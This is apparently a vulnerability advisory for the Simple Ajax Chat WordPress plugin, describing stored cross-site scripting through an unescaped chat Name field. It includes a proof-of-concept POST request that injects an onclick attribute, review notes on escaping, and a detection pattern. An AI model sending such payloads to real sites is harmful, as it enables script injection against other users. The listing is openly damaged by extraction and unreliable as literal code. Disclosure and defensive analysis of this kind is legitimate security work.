Description: The plugin does not prevent visitors from submitting a malicious Name when using the chat. The name is then output unsanitized to other users, which allows cross-site scripting (XSS).
// Proof-of-concept request from the advisory: a form-encoded POST to the plugin's
// chat endpoint (simple-ajax-chat-core.php?sacSendChat=yes) carrying the fields
// n, c, u, sac_nonce and sac_js_nonce, sent with the browser's credentials.
//
// NOTE(review): `n` is presumably the chat Name field the description refers to;
// confirm against the plugin source. Its value holds URL-encoded double quotes (%22)
// around an onclick attribute, so the issue depends on the name being written into
// an HTML attribute without escaping.
//
// NOTE(review): this listing was damaged in extraction and is not valid JavaScript
// as shown. Typographic quotes replace ASCII quotes, `&c;` / `&u;` / `&sac;` look like
// entity artifacts of plain `&c` / `&u` / `&sac`, the Accept value appears to have lost
// characters, and the body string is split across two lines.
//
// Defensive takeaways:
//  - Escape the name for the HTML context it is rendered in (in WordPress, esc_attr()
//    for attributes and esc_html() for text) and validate it server-side on submission.
//  - $NONCE is a placeholder for the nonce values the request carries. Presumably any
//    visitor of the chat page receives them, so they do not restrict who can submit
//    a name; verify.
//  - For detection, review requests to this endpoint whose `n` value contains encoded
//    quotes or event-handler attribute names.
await fetch(“http://vulnerable-site.tld/wp-content/plugins/simple-ajax-chat/simple-ajax-chat-core.php?sacSendChat=yes”, { “credentials”: “include”, “headers”: { “User-Agent”: “Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0”, “Accept”: “/”, “Accept-Language”: “en-CA,en-US;q=0.7,en;q=0.3”, “Content-Type”: “application/x-www-form-urlencoded”, “Sec-GPC”: “1” }, “body”: “n=%22onclick=%22alert1
%22&c;=adasd&u;=https%3A%2F%2F&sac;_nonce=$NONCE&sac;_js_nonce=$NONCE”, “method”: “POST”, “mode”: “cors” });